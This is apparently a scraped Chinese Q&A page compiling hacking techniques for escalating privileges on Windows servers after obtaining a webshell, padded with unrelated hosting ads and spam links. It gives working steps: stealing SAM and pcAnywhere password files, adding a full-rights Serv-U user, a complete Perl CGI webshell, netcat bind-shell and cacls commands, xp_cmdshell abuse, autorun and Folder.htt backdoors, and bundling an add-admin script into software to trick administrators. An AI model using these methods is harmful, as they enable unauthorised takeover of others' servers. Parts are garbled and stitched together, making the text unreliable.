pcanywhere提权windows 提权命令是什么?

pcanywhere提权  时间:2021-10-01  阅读:()

得到wedshell后怎么提权啊

本篇文章结合了许多高手提升权限的技巧和自己的一些想法 当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 看能 否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 2.C:WINNTsystem32config进这里下它的SAM,破解用户的密码 c:winnt epaire 下是备份 用到破解sam密码的软件有LC,SAMinside 3.C:Documents and SettingsAll Users「开始」菜单程序 看这里能跳转不,我们从这里 可以获取好多有用的信息 可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否 跳转 进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空 [USER=dede|1] Password= HomeDir=c: TimeOut=600 Maintenance=System ess1=C:|RWAMELCDP ess1=d:|RWAMELCDP ess1=f:|RWAMELCDP SKEYValues= 这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限 ServUAdmin.ini ServUDaemon.ini 4.c:winntsystem32srvdata就是这个目录,同样是erveryone 完全控制,我们所要做 的就是把提升权限的工具上传上去,然后执行 5.看能否跳转到如下目录 c:php, 用phpspy c:prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html ", 27); $_ = $ENV{QUERY_STRING}; s/%20/ /ig; s/%2f///ig; $execthis = $_; syswrite(STDOUT, " ", 13); open(STDERR, ">&STDOUT") || die "Can't redirect STDERR"; system($execthis); syswrite(STDOUT, " ", 17); close(STDERR); close(STDOUT); exit; 保存为cgi执行, 如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 mand" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 现在是 IUSR 权限,提交: http://anyhost//cmd.pl?cperlinsu.exe "cacls.exe c: /E /T /G everyone:F" http://anyhost//cmd.pl?cperlinsu.exe "cacls.exe d: /E /T /G everyone:F" http://anyhost//cmd.pl?cperlinsu.exe "cacls.exe e: /E /T /G everyone:F" http:/

域用户怎样给自己提权?

自己是没办法提权的,只有让管理员“帮你提权”!方法很多,你可以写一些添加管理员或者提权的脚本诱惑管理员打开或者放在开始菜单的启动文件夹里让管理员重启动时脚本自动运行,我推荐你用捆绑的方法,这样不易被发现。

需要:一个.bat文件(cmd批处理:功能是添加用户并提权), 一个.vbs文件(vbs脚本:功能主要是让bat后台运行,不弹出cmd窗口), 一个管理员常用的软件, 然后用windows自带的捆绑软件(在运行里输入 iexpress)把以上三个文件捆绑成一个文件并设置运行顺序(首先运行vbs,然后运行软件)。

呵呵,具体的脚本命令你可以在网上搜,不会了再问我! 如果想弄的天衣无缝的话,建议:1.捆绑应用软件前先备份 2.捆绑后,用一个图标修改软件把捆绑后的软件图标修改成和以前一样的 3.提权后(管理员运行后)把备份的软件替换回来(不然的话,如果是重复添加相同用户可能会报错) 4.如果是新添加了一个管理员用户,这样很容易被发现,建议进行把该账号进行隐藏和克隆。

呵呵,以上技术只供研究,不提倡使用! 这和“公司的电脑都没光驱或软驱”没什么联系。

拿到webshell后如何提权拿下他的服务器?

以下全部是入侵提权的一些总结,很多方法至今没有机会试验也不一定成功,但是我是的确看见别人成功过的。

现在贴出一些别人的经验总结。

希望对朋友有帮助! 1.radmin连接法 条件是你权限够大,对方连防火墙也没有。

封装个radmin上去,运行,开对方端口,然后radmin上去。

本人从来没成功过,端口到是给对方打开了。

2.paanywhere C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 这里下他的GIF文件,在本地安装pcanywhere上去。

3.SAM破解 C:WINNTsystem32config 下他的SAM 破解之。

4.SU密码夺取 C:Documents and SettingsAll Users「开始」菜单程序引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转。

进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空。

[USER=WekweN|1] Password= HomeDir=c: TimeOut=600 Maintenance=System ess1=C:|RWAMELCDP ess1=d:|RWAMELCDP ess1=f:|RWAMELCDP SKEYValues= 这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限。

5.c:winntsystem32srvdata 引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行。

6.SU溢出提权 这个网上教程N多,不详细讲解了。

7.运行Csript 引用:运行"cscript C:pubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps"来提升权限。

用这个cscript C:pubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps ,查看有特权的dll文件:idq.dll srvasp.dll (不同的机子放的位置不一定一样),我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32srvsrvsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32srvasp.dll" 。

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了。

8.脚本提权 c:Documents and SettingsAll Users「开始」菜单程序启动"写入bat,vbs。

9.VNC 默认情况下VNC密码存放在HKCUSoftwareORLWinVNC3Password,我们可以用vncx4破解它。

vncx4使用很简单,只要在命令行下输入: c:>vncx4 -W 然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。

10.NC提权 给对方来个NC,但是条件是你要有足够的运行权限,然后把它反弹到自己的电脑上。

11.社会工程学之GUEST提权 很简单,查看他的用户。

一般来说看到帐户以后,密码尽量猜。

可能用户密码一样,也可能是他QQ号、邮箱号、手机号。

尽量看看。

12.IPC空连接 如果对方真比较白痴的话,扫他的IPC,如果运气好还是弱口令。

13.替换服务 这个不用说了吧?个人感觉相当复杂。

14.autorun .inf autorun=xxx.exe,这个=后面自己写。

加上只读、系统、隐藏属性,传到哪个盘都可以的,不相信他不运行。

.ini与Folder.htt 引用:首先,我们现在本地建立一个文件夹,名字不重要。

进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。

完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”),然后我们在Folder setting目录下找到Folder.htt文件,记事本打开。

在任意地方加入以下代码:,然后你将你的后门文件放在Folder setting目录下,把此目录与.ini一起上传到对方任意一个目录下,就可以了。

只要等管理员浏览了此目录,它就执行了我们的后门。

16.su覆盖提权 本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了。

17.SU转发端口 43958这个是 Serv -U 的本地管理端口,FPIPE.exe上传他,执行命令: Fpipe ?Cv ?Cl 3333 ?Cr 43958 127.0.0.1 意思是将4444端口映射到43958端口上。

然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为$ak#.1k;0@p">#1@$ak#.1k;0@p,连接上后你就可以管理他的Serv-u了。

18.SQL帐户密码泄露 如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。

引用:对方没有删除xp_cmdshell方法:使用Sqlexec.exe,在host一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。

format选择xp_cmdshell”%s”即可。

然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了。

19.asp.dll 引用:因为asp.dll是放在c:winntsystem32srvasp.dll (不同的机子放的位置不一定相同),我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32srvsrvsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32srvasp.dll"。

好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去 了。

注意,用法中的get和set,一个是查看一个是设置,还有就是你运行上面的你要到C:pubAdminScripts>这个目录下。

那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll 剔出特权一族。

也就是用set这个命令,覆盖掉刚才的那些东东。

windows 提权命令是什么?

进入纯DOS(MSDOS中我没有试过),新建一个用户和密码,或者使用你原来的这个也是可以的,并把这个账号提升到管理员权限.命令是:建立用户账号,NET USER 用户名 密码 /ADD 提升权限用NET LOCALGROUP ADMINISTRATORS 用户名 /ADD.记住那个/ADD一定要加的,因为那是强制执行.

提速啦(24元/月)河南BGP云服务器活动 买一年送一年4核 4G 5M

提速啦的来历提速啦是 网站 本着“良心 便宜 稳定”的初衷 为小白用户避免被坑 由赣州王成璟网络科技有限公司旗下赣州提速啦网络科技有限公司运营 投资1000万人民币 在美国Cera 香港CTG 香港Cera 国内 杭州 宿迁 浙江 赣州 南昌 大连 辽宁 扬州 等地区建立数据中心 正规持有IDC ISP CDN 云牌照 公司。公司购买产品支持3天内退款 超过3天步退款政策。提速啦的市场定位提速啦主...

Pia云服务商春节6.66折 美国洛杉矶/中国香港/俄罗斯和深圳机房

Pia云这个商家的云服务器在前面也有介绍过几次,从价格上确实比较便宜。我们可以看到最低云服务器低至月付20元,服务器均采用KVM虚拟架构技术,数据中心包括美国洛杉矶、中国香港、俄罗斯和深圳地区,这次春节活动商家的活动力度比较大推出出全场6.66折,如果我们有需要可以体验。初次体验的记得月付方案,如果合适再续约。pia云春节活动优惠券:piayun-2022 Pia云服务商官方网站我们一起看看这次活...

spinservers:10Gbps带宽高配服务器月付89美元起,达拉斯/圣何塞机房

spinservers是一家主营国外服务器租用和Hybrid Dedicated等产品的商家,Majestic Hosting Solutions LLC旗下站点,商家数据中心包括美国达拉斯和圣何塞机房,机器一般10Gbps端口带宽,且硬件配置较高。目前,主机商针对达拉斯机房机器提供优惠码,最低款Dual E5-2630L v2+64G+1.6TB SSD月付89美元起,支持PayPal、支付宝等...

pcanywhere提权为你推荐
宝安网站制作宝安网站制作哪家公司最好智慧充电桩鑫轩智慧用电的安装方法计算机网络安全试题计算机网络三级考试数据库系统概论大二学了《数据库系统概论》这本书,请问可以考计算机三级数据库吗?源码哥有报过源码熊的家长吗?他们的课程怎么样?孩子能听懂吗?剑灵服务器剑灵现在哪个区服务器的人多,有新服务器吗?中山大学南校区地址求中山大学地址天津职业大学地址天津职业大学简介是?机柜生产厂河北省青县做机箱、机柜的厂子的老板怎么都姓朱呢?feedback怎么把iPhone的Feedback删除?
域名抢注 132邮箱 香港加速器 stablehost 128m内存 双12活动 美国php主机 天猫双十一秒杀 html空间 admit的用法 最好的免费空间 hinet 免费活动 亚马逊香港官网 服务器是干什么的 1g空间 空间首页登陆 移动服务器托管 免费ftp cxz 更多